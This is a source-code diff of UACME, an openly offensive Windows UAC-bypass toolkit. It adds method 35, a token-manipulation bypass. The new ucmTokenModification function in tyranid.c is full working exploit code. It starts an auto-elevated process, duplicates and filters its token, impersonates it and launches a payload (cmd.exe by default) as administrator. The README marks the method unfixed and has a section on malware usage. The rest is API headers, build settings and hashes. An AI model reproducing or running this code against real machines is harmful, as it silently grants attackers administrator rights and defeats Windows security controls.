diff --git a/Compiled/Akagi32.exe b/Compiled/Akagi32.exe
index 13833d1..359314e 100644
Binary files a/Compiled/Akagi32.exe and b/Compiled/Akagi32.exe differ
diff --git a/Compiled/Akagi64.exe b/Compiled/Akagi64.exe
index a9c6d66..589d08b 100644
Binary files a/Compiled/Akagi64.exe and b/Compiled/Akagi64.exe differ
diff --git a/README.md b/README.md
index eb3b75b..de55f61 100644
--- a/README.md
+++ b/README.md
@@ -288,6 +288,15 @@ Keys (watch debug output with dbgview or similar for more info):
* AlwaysNotify compatible
* Fixed in: unfixed :see_no_evil:
* How: -
+35. Author: CIA & James Forshaw
+ * Type: Impersonation
+ * Method: Token Manipulations
+ * Target(s): Autoelevated applications
+ * Component(s): Attacker defined applications
+ * Works from: Windows 7 (7600)
+ * AlwaysNotify compatible, see note
+ * Fixed in: unfixed :see_no_evil:
+ * How: -
Note:
* Method (6) unavailable in wow64 environment starting from Windows 8;
@@ -295,7 +304,8 @@ Note:
* Method (13) (19) and above implemented only in x64 version;
* Method (14) require process injection, wow64 unsupported, use x64 version of this tool;
* Method (26) is still working, however it main advantage was UAC bypass on AlwaysNotify level. Since 15031 it is gone;
-* Method (30) require x64 because it abuses WOW64 subsystem feature.
+* Method (30) require x64 because it abuses WOW64 subsystem feature;
+* Method (35) AlwaysNotify compatible as there always will be running autoelevated apps or user will have to launch them anyway.
Run examples:
* akagi32.exe 1
@@ -317,7 +327,6 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
# Protection
-* UAC turned on maximum level and full awareness about every window it will show;
* Account without administrative privileges.
# Malware usage
@@ -348,7 +357,11 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
* UAC Bypass or story about three escalations, https://habrahabr.ru/company/pm/blog/328008/
* Exploiting Environment Variables in Scheduled Tasks for UAC Bypass, https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html
* First entry: Welcome and fileless UAC bypass, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
-
+* Reading Your Way Around UAC in 3 parts:
+ 1. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html
+ 2. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html
+ 3. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html
+
# Authors
(c) 2014 - 2017 UACMe Project
diff --git a/Source/Akagi/Resource.rc b/Source/Akagi/Resource.rc
index 8645796..7275d07 100644
Binary files a/Source/Akagi/Resource.rc and b/Source/Akagi/Resource.rc differ
diff --git a/Source/Akagi/methods/enigma0x3.c b/Source/Akagi/methods/enigma0x3.c
index 707cb43..4510c90 100644
--- a/Source/Akagi/methods/enigma0x3.c
+++ b/Source/Akagi/methods/enigma0x3.c
@@ -4,9 +4,9 @@
*
* TITLE: ENIGMA0X3.C
*
-* VERSION: 2.72
+* VERSION: 2.73
*
-* DATE: 26 May 2017
+* DATE: 27 May 2017
*
* Enigma0x3 autoelevation methods and everything based on the same
* ShellExecute related registry manipulations idea.
@@ -477,16 +477,16 @@ BOOL ucmSdcltIsolatedCommandMethod(
if (lpszPayload != NULL) {
lpBuffer = lpszPayload;
- sz = _strlen(lpszPayload);
}
else {
//no payload specified, use default cmd.exe
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
supExpandEnvironmentStrings(T_DEFAULT_CMD, szBuffer, MAX_PATH);
- sz = _strlen(szBuffer);
lpBuffer = szBuffer;
}
+ sz = _strlen(lpBuffer);
+
lResult = RegCreateKeyEx(HKEY_CURRENT_USER, T_EXEFILE_SHELL, 0, NULL,
REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, NULL);
@@ -586,16 +586,16 @@ BOOL ucmMsSettingsDelegateExecuteMethod(
if (lpszPayload != NULL) {
lpBuffer = lpszPayload;
- sz = _strlen(lpszPayload);
}
else {
//no payload specified, use default cmd.exe
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
supExpandEnvironmentStrings(T_DEFAULT_CMD, szBuffer, MAX_PATH);
- sz = _strlen(szBuffer);
lpBuffer = szBuffer;
}
+ sz = _strlen(lpBuffer);
+
_strcpy(szKey, T_MSSETTINGS);
_strcat(szKey, T_SHELL_OPEN_COMMAND);
lResult = RegCreateKeyEx(HKEY_CURRENT_USER, szKey, 0, NULL,
diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c
index 23009fd..f73413d 100644
--- a/Source/Akagi/methods/methods.c
+++ b/Source/Akagi/methods/methods.c
@@ -4,9 +4,9 @@
*
* TITLE: METHODS.C
*
-* VERSION: 2.72
+* VERSION: 2.73
*
-* DATE: 26 May 2017
+* DATE: 27 May 2017
*
* UAC bypass dispatch.
*
@@ -46,6 +46,7 @@ UCM_API(MethodEnigma0x3_4);
UCM_API(MethodUiAccess);
UCM_API(MethodMsSettings);
UCM_API(MethodTyranid);
+UCM_API(MethodTokenMod);
UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
@@ -82,7 +83,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodEnigma0x3_4, NULL, {10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodUiAccess, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodMsSettings, NULL, { 10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
- { MethodTyranid, NULL, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }
+ { MethodTyranid, NULL, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
+ { MethodTokenMod, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }
};
/*
@@ -664,3 +666,23 @@ UCM_API(MethodTyranid)
return ucmDiskCleanupEnvironmentVariable(lpszPayload);
}
+
+UCM_API(MethodTokenMod)
+{
+ LPWSTR lpszPayload = NULL;
+
+ UNREFERENCED_PARAMETER(Method);
+ UNREFERENCED_PARAMETER(ExtraContext);
+ UNREFERENCED_PARAMETER(PayloadCode);
+ UNREFERENCED_PARAMETER(PayloadSize);
+
+ //
+ // Select target application or use given by optional parameter.
+ //
+ if (g_ctx.OptionalParameterLength == 0)
+ lpszPayload = NULL;
+ else
+ lpszPayload = g_ctx.szOptionalParameter;
+
+ return ucmTokenModification(lpszPayload);
+}
diff --git a/Source/Akagi/methods/methods.h b/Source/Akagi/methods/methods.h
index 601ba7e..8e18875 100644
--- a/Source/Akagi/methods/methods.h
+++ b/Source/Akagi/methods/methods.h
@@ -4,9 +4,9 @@
*
* TITLE: METHODS.H
*
-* VERSION: 2.72
+* VERSION: 2.73
*
-* DATE: 26 May 2017
+* DATE: 27 May 2017
*
* Prototypes and definitions for UAC bypass methods table.
*
@@ -54,6 +54,7 @@ typedef enum _UCM_METHOD {
UacMethodUiAccess, //+
UacMethodMsSettings, //+
UacMethodTyranid, //+
+ UacMethodTokenMod, //+
UacMethodMax
} UCM_METHOD;
diff --git a/Source/Akagi/methods/tyranid.c b/Source/Akagi/methods/tyranid.c
index 2bf4832..7e3be40 100644
--- a/Source/Akagi/methods/tyranid.c
+++ b/Source/Akagi/methods/tyranid.c
@@ -1,14 +1,15 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2016 - 2017
+* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: TYRANID.C
*
-* VERSION: 2.72
+* VERSION: 2.73
*
-* DATE: 26 May 2017
+* DATE: 27 May 2017
*
* James Forshaw autoelevation method(s)
+* Fine Dinning Tool (c) CIA
*
* For description please visit original URL
* https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html
@@ -21,14 +22,12 @@
*******************************************************************************/
#include "global.h"
-
/*
* ucmDiskCleanupEnvironmentVariable
*
* Purpose:
*
-* Use cleanmgr innovation implemented in Windows 10+.
-* Cleanmgr.exe uses current user environment variables to build a path to the executable task.
+* DiskCleanup task uses current user environment variables to build a path to the executable.
* Warning: this method works with AlwaysNotify UAC level.
*
*/
@@ -81,3 +80,226 @@ BOOL ucmDiskCleanupEnvironmentVariable(
return bResult;
}
+
+/*
+* ucmTokenModification
+*
+* Purpose:
+*
+* Obtains the token from an auto-elevated process, modifies it, and reuses it to execute as administrator.
+*
+*/
+BOOL ucmTokenModification(
+ _In_opt_ LPWSTR lpszPayload
+)
+{
+ BOOL bCond = FALSE, bResult = FALSE;
+ NTSTATUS Status = STATUS_UNSUCCESSFUL;
+ HANDLE hProcessToken = NULL, hDupToken = NULL, hLuaToken = NULL, hImpToken = NULL;
+
+ SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
+ PSID pIntegritySid = NULL;
+ TOKEN_MANDATORY_LABEL tml;
+ SECURITY_QUALITY_OF_SERVICE sqos;
+ OBJECT_ATTRIBUTES obja;
+
+ LPWSTR lpBuffer = NULL;
+
+ STARTUPINFO si;
+ PROCESS_INFORMATION pi;
+ SHELLEXECUTEINFO shinfo;
+ WCHAR szBuffer[MAX_PATH + 1];
+
+ RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
+
+ do {
+
+ if (lpszPayload != NULL) {
+ lpBuffer = lpszPayload;
+ }
+ else {
+ //no payload specified, use default cmd.exe
+ RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
+ supExpandEnvironmentStrings(T_DEFAULT_CMD, szBuffer, MAX_PATH);
+ lpBuffer = szBuffer;
+ }
+
+ //
+ // Run autoelevated app (any).
+ //
+ shinfo.cbSize = sizeof(shinfo);
+ shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
+ shinfo.lpFile = WUSA_EXE;
+ shinfo.nShow = SW_HIDE;
+ if (!ShellExecuteEx(&shinfo)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->ShellExecute"),
+ GetLastError());
+#endif
+ break;
+ }
+
+ //
+ // Open token of elevated process.
+ //
+ Status = NtOpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken);
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->NtOpenProcessToken"),
+ Status);
+#endif
+ break;
+ }
+
+ //
+ // Duplicate primary token.
+ //
+ sqos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
+ sqos.ImpersonationLevel = SecurityImpersonation;
+ sqos.ContextTrackingMode = 0;
+ sqos.EffectiveOnly = FALSE;
+ InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);
+ obja.SecurityQualityOfService = &sqos;
+ Status = NtDuplicateToken(hProcessToken, TOKEN_ALL_ACCESS, &obja, FALSE, TokenPrimary, &hDupToken);
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->NtDuplicateToken"),
+ Status);
+#endif
+ break;
+ }
+
+ //
+ // Lower duplicated token IL from High to Medium.
+ //
+ Status = RtlAllocateAndInitializeSid(&MLAuthority,
+ 1, SECURITY_MANDATORY_MEDIUM_RID,
+ 0, 0, 0, 0, 0, 0, 0,
+ &pIntegritySid);
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->RtlAllocateAndInitializeSid"),
+ Status);
+#endif
+ break;
+ }
+
+ tml.Label.Attributes = SE_GROUP_INTEGRITY;
+ tml.Label.Sid = pIntegritySid;
+
+ Status = NtSetInformationToken(hDupToken, TokenIntegrityLevel, &tml,
+ sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid));
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->NtSetInformationToken"),
+ Status);
+#endif
+ break;
+ }
+
+ //
+ // Create restricted token.
+ //
+ Status = NtFilterToken(hDupToken, LUA_TOKEN, NULL, NULL, NULL, &hLuaToken);
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->NtFilterToken"),
+ Status);
+#endif
+ break;
+ }
+
+ //
+ // Impersonate logged on user.
+ //
+ hImpToken = NULL;
+ Status = NtDuplicateToken(hLuaToken, TOKEN_IMPERSONATE | TOKEN_QUERY,
+ &obja,
+ FALSE,
+ TokenImpersonation,
+ &hImpToken);
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->NtDuplicateToken2"),
+ Status);
+#endif
+ break;
+ }
+
+ Status = NtSetInformationThread(
+ NtCurrentThread(),
+ ThreadImpersonationToken,
+ &hImpToken,
+ sizeof(HANDLE));
+
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->NtSetInformationThread"),
+ Status);
+#endif
+ break;
+ }
+
+ NtClose(hImpToken);
+ hImpToken = NULL;
+
+ //
+ // Run target.
+ //
+ RtlSecureZeroMemory(&si, sizeof(si));
+ si.cb = sizeof(si);
+ GetStartupInfo(&si);
+
+ si.dwFlags = STARTF_USESHOWWINDOW;
+ si.wShowWindow = SW_SHOW;
+
+ RtlSecureZeroMemory(&pi, sizeof(pi));
+
+ bResult = CreateProcessWithLogonW(TEXT("uac"), TEXT("is"), TEXT("useless"),
+ LOGON_NETCREDENTIALS_ONLY,
+ lpBuffer,
+ NULL, 0, NULL, NULL,
+ &si, &pi);
+
+ if (bResult) {
+ if (pi.hThread) CloseHandle(pi.hThread);
+ if (pi.hProcess) CloseHandle(pi.hProcess);
+ }
+
+ //
+ // Revert to self.
+ //
+ hImpToken = NULL;
+ Status = NtSetInformationThread(
+ NtCurrentThread(),
+ ThreadImpersonationToken,
+ (PVOID)&hImpToken,
+ sizeof(HANDLE));
+ if (!NT_SUCCESS(Status)) {
+#ifdef _INT_DEBUG
+ supDebugPrint(
+ TEXT("ucmTokenModification->NtSetInformationThread2"),
+ Status);
+#endif
+ }
+
+ } while (bCond);
+
+ if (hImpToken) NtClose(hImpToken);
+ if (hProcessToken) NtClose(hProcessToken);
+ if (hDupToken) NtClose(hDupToken);
+ if (hLuaToken) NtClose(hLuaToken);
+ if (shinfo.hProcess) NtClose(shinfo.hProcess);
+ if (pIntegritySid) RtlFreeSid(pIntegritySid);
+
+ RtlSetLastWin32Error(RtlNtStatusToDosError(Status));
+ return bResult;
+}
diff --git a/Source/Akagi/methods/tyranid.h b/Source/Akagi/methods/tyranid.h
index da1b5b5..4f1245d 100644
--- a/Source/Akagi/methods/tyranid.h
+++ b/Source/Akagi/methods/tyranid.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2016 - 2017
+* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: TYRANID.H
*
-* VERSION: 2.72
+* VERSION: 2.73
*
-* DATE: 26 May 2017
+* DATE: 27 May 2017
*
* Prototypes and definitions for James Forshaw method(s).
*
@@ -20,3 +20,6 @@
BOOL ucmDiskCleanupEnvironmentVariable(
_In_opt_ LPWSTR lpszPayload);
+
+BOOL ucmTokenModification(
+ _In_opt_ LPWSTR lpszPayload);
diff --git a/Source/Hibiki/hibiki.suppress b/Source/Hibiki/hibiki.suppress
new file mode 100644
index 0000000..5340957
--- /dev/null
+++ b/Source/Hibiki/hibiki.suppress
@@ -0,0 +1,50 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 2
+
+
+ rtltypes.h
+ V112
+ Dangerous magic number _x_ used: return c + _x_;.
+ 172268903
+ 355059
+ 539
+
+
\ No newline at end of file
diff --git a/Source/Inazuma/main.c b/Source/Inazuma/main.c
index 658912b..a1ec895 100644
--- a/Source/Inazuma/main.c
+++ b/Source/Inazuma/main.c
@@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
-* VERSION: 2.70
+* VERSION: 2.73
*
-* DATE: 24 Mar 2017
+* DATE: 27 May 2017
*
* ShellCode.
*
@@ -19,6 +19,10 @@
//disable nonmeaningful warnings.
#pragma warning(disable: 4005) // macro redefinition
+#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s
+#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
+#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
+#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#include
#include "shared\ntos.h"
diff --git a/Source/Naka/Naka.vcxproj b/Source/Naka/Naka.vcxproj
index 48099ca..f81b7aa 100644
--- a/Source/Naka/Naka.vcxproj
+++ b/Source/Naka/Naka.vcxproj
@@ -5,6 +5,14 @@
Debug
Win32
+
+ ReleaseInternal
+ Win32
+
+
+ ReleaseInternal
+ x64
+
Release
Win32
@@ -38,6 +46,13 @@
true
Unicode
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
Application
true
@@ -51,6 +66,13 @@
true
Unicode
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
@@ -62,12 +84,18 @@
+
+
+
+
+
+
true
@@ -90,6 +118,13 @@
$(ProjectName)32
AllRules.ruleset
+
+ false
+ .\output\$(Platform)\$(Configuration)\
+ .\output\$(Platform)\$(Configuration)\
+ $(ProjectName)32
+ AllRules.ruleset
+
false
.\output\$(Platform)\$(Configuration)\
@@ -97,6 +132,13 @@
$(ProjectName)64
AllRules.ruleset
+
+ false
+ .\output\$(Platform)\$(Configuration)\
+ .\output\$(Platform)\$(Configuration)\
+ $(ProjectName)64
+ AllRules.ruleset
+
@@ -130,6 +172,32 @@
+
+ Level4
+
+
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
+ true
+ CompileAsC
+ $(SolutionDir)
+
+
+ Windows
+ true
+ true
+ false
+ true
+ main
+
+
+
+
+
+
+
Level4
@@ -155,6 +223,32 @@
+
+ Level4
+
+
+ MaxSpeed
+ true
+ true
+ NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
+ true
+ CompileAsC
+ $(SolutionDir)
+
+
+ Windows
+ true
+ true
+ false
+ true
+ main
+
+
+
+
+
+
+
Level4
diff --git a/Source/Shared/ntos.h b/Source/Shared/ntos.h
index 5b77c7d..8e4dc24 100644
--- a/Source/Shared/ntos.h
+++ b/Source/Shared/ntos.h
@@ -4,9 +4,9 @@
*
* TITLE: NTOS.H
*
-* VERSION: 1.66
+* VERSION: 1.70
*
-* DATE: 02 May 2017
+* DATE: 27 May 2017
*
* Common header file for the ntos API functions and definitions.
*
@@ -1142,6 +1142,37 @@ typedef struct _OBJECT_HANDLE_FLAG_INFORMATION
** Objects END
*/
+/*
+** Boot Entry START
+*/
+
+typedef struct _FILE_PATH {
+ ULONG Version;
+ ULONG Length;
+ ULONG Type;
+ UCHAR FilePath[ANYSIZE_ARRAY];
+} FILE_PATH, *PFILE_PATH;
+
+typedef struct _BOOT_ENTRY {
+ ULONG Version;
+ ULONG Length;
+ ULONG Id;
+ ULONG Attributes;
+ ULONG FriendlyNameOffset;
+ ULONG BootFilePathOffset;
+ ULONG OsOptionsLength;
+ UCHAR OsOptions[ANYSIZE_ARRAY];
+} BOOT_ENTRY, *PBOOT_ENTRY;
+
+typedef struct _BOOT_ENTRY_LIST {
+ ULONG NextEntryOffset;
+ BOOT_ENTRY BootEntry;
+} BOOT_ENTRY_LIST, *PBOOT_ENTRY_LIST;
+
+/*
+** Boot Entry END
+*/
+
/*
** File start
*/
@@ -4602,7 +4633,7 @@ BOOLEAN NTAPI RtlCreateUnicodeString(
VOID NTAPI RtlInitUnicodeString(
_Inout_ PUNICODE_STRING DestinationString,
- _In_ PCWSTR SourceString
+ _In_opt_ PCWSTR SourceString
);
BOOLEAN NTAPI RtlEqualUnicodeString(
@@ -5557,14 +5588,50 @@ NTSTATUS NTAPI NtMapViewOfSection(
NTSTATUS NTAPI NtUnmapViewOfSection(
_In_ HANDLE ProcessHandle,
_In_ PVOID BaseAddress
- );
+ );
NTSTATUS NTAPI NtOpenProcessToken(
- _In_ HANDLE ProcessHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _Out_ PHANDLE TokenHandle
- );
+ _In_ HANDLE ProcessHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE TokenHandle
+ );
+NTSTATUS NTAPI NtDuplicateToken(
+ _In_ HANDLE ExistingTokenHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ BOOLEAN EffectiveOnly,
+ _In_ TOKEN_TYPE TokenType,
+ _Out_ PHANDLE NewTokenHandle
+ );
+
+NTSTATUS NTAPI NtFilterToken(
+ _In_ HANDLE ExistingTokenHandle,
+ _In_ ULONG Flags,
+ _In_opt_ PTOKEN_GROUPS SidsToDisable,
+ _In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete,
+ _In_opt_ PTOKEN_GROUPS RestrictedSids,
+ _Out_ PHANDLE NewTokenHandle
+ );
+
+NTSTATUS NTAPI NtImpersonateAnonymousToken(
+ _In_ HANDLE ThreadHandle
+ );
+
+NTSTATUS NTAPI NtQueryInformationToken(
+ _In_ HANDLE TokenHandle,
+ _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
+ _Out_ PVOID TokenInformation,
+ _In_ ULONG TokenInformationLength,
+ _Out_ PULONG ReturnLength
+ );
+
+NTSTATUS NTAPI NtSetInformationToken(
+ _In_ HANDLE TokenHandle,
+ _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
+ _In_ PVOID TokenInformation,
+ _In_ ULONG TokenInformationLength
+ );
NTSTATUS NTAPI NtOpenThreadTokenEx(
_In_ HANDLE ThreadHandle,
@@ -5591,6 +5658,20 @@ NTSTATUS NTAPI NtQueryInformationToken(
_Out_ PULONG ReturnLength
);
+#define DISABLE_MAX_PRIVILEGE 0x1 // winnt
+#define SANDBOX_INERT 0x2 // winnt
+#define LUA_TOKEN 0x4
+#define WRITE_RESTRICT 0x8
+
+NTSTATUS NTAPI NtFilterToken(
+ _In_ HANDLE ExistingTokenHandle,
+ _In_ ULONG Flags,
+ _In_opt_ PTOKEN_GROUPS SidsToDisable,
+ _In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete,
+ _In_opt_ PTOKEN_GROUPS RestrictedSids,
+ _Out_ PHANDLE NewTokenHandle
+ );
+
NTSTATUS NTAPI NtCreateKey(
_Out_ PHANDLE KeyHandle,
_In_ ACCESS_MASK DesiredAccess,
@@ -5691,19 +5772,6 @@ NTSTATUS NTAPI NtQueryFullAttributesFile(
__out PFILE_NETWORK_OPEN_INFORMATION FileInformation
);
-NTSTATUS NTAPI NtFsControlFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG FsControlCode,
- _In_ PVOID InputBuffer,
- _In_ ULONG InputBufferLength,
- _Out_ PVOID OutputBuffer,
- _In_ ULONG OutputBufferLength
- );
-
NTSTATUS NTAPI NtQueryDirectoryFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
@@ -5888,6 +5956,32 @@ NTSTATUS NTAPI NtCreateFile(
_In_ ULONG EaLength
);
+NTSTATUS NTAPI NtDeviceIoControlFile(
+ _In_ HANDLE FileHandle,
+ _In_ HANDLE Event,
+ _In_ PIO_APC_ROUTINE ApcRoutine,
+ _In_ PVOID ApcContext,
+ _Out_ PIO_STATUS_BLOCK IoStatusBlock,
+ _In_ ULONG IoControlCode,
+ _In_ PVOID InputBuffer,
+ _In_ ULONG InputBufferLength,
+ _Out_ PVOID OutputBuffer,
+ _In_ ULONG OutputBufferLength
+ );
+
+NTSTATUS NTAPI NtFsControlFile(
+ _In_ HANDLE FileHandle,
+ _In_opt_ HANDLE Event,
+ _In_opt_ PIO_APC_ROUTINE ApcRoutine,
+ _In_opt_ PVOID ApcContext,
+ _Out_ PIO_STATUS_BLOCK IoStatusBlock,
+ _In_ ULONG FsControlCode,
+ _In_opt_ PVOID InputBuffer,
+ _In_ ULONG InputBufferLength,
+ _Out_opt_ PVOID OutputBuffer,
+ _In_ ULONG OutputBufferLength
+ );
+
NTSTATUS NTAPI NtCreateUserProcess(
_Out_ PHANDLE ProcessHandle,
_Out_ PHANDLE ThreadHandle,
@@ -6177,34 +6271,29 @@ NTSTATUS NTAPI NtAcceptConnectPort(
_In_ PPORT_MESSAGE ConnectionRequest,
_In_ BOOLEAN AcceptConnection,
_Inout_opt_ PPORT_VIEW ServerView,
- _Out_opt_ PREMOTE_PORT_VIEW ClientView
- );
+ _Out_opt_ PREMOTE_PORT_VIEW ClientView);
typedef
VOID
(*PPS_APC_ROUTINE) (
_In_opt_ PVOID ApcArgument1,
_In_opt_ PVOID ApcArgument2,
- _In_opt_ PVOID ApcArgument3
- );
+ _In_opt_ PVOID ApcArgument3);
NTSTATUS NTAPI NtQueueApcThread(
_In_ HANDLE ThreadHandle,
_In_ PPS_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcArgument1,
_In_opt_ PVOID ApcArgument2,
- _In_opt_ PVOID ApcArgument3
- );
+ _In_opt_ PVOID ApcArgument3);
NTSTATUS NTAPI NtWaitForSingleObject(
_In_ HANDLE Handle,
_In_ BOOLEAN Alertable,
- _In_opt_ PLARGE_INTEGER Timeout
- );
+ _In_opt_ PLARGE_INTEGER Timeout);
NTSTATUS NTAPI NtYieldExecution(
- VOID
- );
+ VOID);
NTSTATUS NTAPI NtCreateMailslotFile(
_Out_ PHANDLE FileHandle,
@@ -6214,8 +6303,7 @@ NTSTATUS NTAPI NtCreateMailslotFile(
_In_ ULONG CreateOptions,
_In_ ULONG MailslotQuota,
_In_ ULONG MaximumMessageSize,
- _In_ PLARGE_INTEGER ReadTimeout
-);
+ _In_ PLARGE_INTEGER ReadTimeout);
NTSTATUS NTAPI NtSecureConnectPort(
_Out_ PHANDLE PortHandle,
@@ -6226,5 +6314,9 @@ NTSTATUS NTAPI NtSecureConnectPort(
_Inout_opt_ PREMOTE_PORT_VIEW ServerView,
_Out_opt_ PULONG MaxMessageLength,
_Inout_opt_ PVOID ConnectionInformation,
- _Inout_opt_ PULONG ConnectionInformationLength
-);
+ _Inout_opt_ PULONG ConnectionInformationLength);
+
+NTSTATUS NTAPI NtEnumerateBootEntries(
+ _Out_ PVOID Buffer,
+ _Inout_ PULONG BufferLength);
+
diff --git a/Source/uacme.sln b/Source/uacme.sln
index c6c653f..9333617 100644
--- a/Source/uacme.sln
+++ b/Source/uacme.sln
@@ -112,8 +112,8 @@ Global
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|x64.Build.0 = Debug|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.ActiveCfg = Release|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.Build.0 = Release|Win32
- {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.ActiveCfg = Release|x64
- {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.Build.0 = Release|x64
+ {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.ActiveCfg = ReleaseInternal|x64
+ {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.Build.0 = ReleaseInternal|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.ActiveCfg = Release|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.Build.0 = Release|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|x64.ActiveCfg = Release|x64
diff --git a/UACME.sha256 b/UACME.sha256
index 387032a..5764dde 100644
--- a/UACME.sha256
+++ b/UACME.sha256
@@ -1,8 +1,8 @@
-a9ed36b3b02bac486e82e55ebc2f1276de8bb442457d445b39f9ca79fd1508c0 *Compiled\Akagi32.exe
-ba610693469c3034ebf9d86f570313fd67a0b9324b29d86f51ec9aef3269a3e2 *Compiled\Akagi64.exe
+46e4306bdea79c3e8269b78637bbbe510d6ee65ea18268f7788aec26b4806c41 *Compiled\Akagi32.exe
+b0e32db8c822014c282ef3aba46bac0bf934c4c3d0fcde2f3bf5f64f39789044 *Compiled\Akagi64.exe
376d63708d4e0d761f6d9224b9d5504c07b3cd5b5ae5fd40a3a3d77c4d5873d5 *Compiled\UacInfo64.exe
c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdll\readme1st.txt
-071fc8be1475719eca58c9dffb36e84a4c281ec77c84f82518d948d9d13d0e9a *Source\uacme.sln
+4d14153dd95bd5441763283de03afb74aa5f3fc0b68d7629be43d27e3d41c5e1 *Source\uacme.sln
8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
3fb2b94aa2ee33753fcc20fa1834be8a929a29248217cfb84a54956eeea1a824 *Source\Akagi\bin32res.h
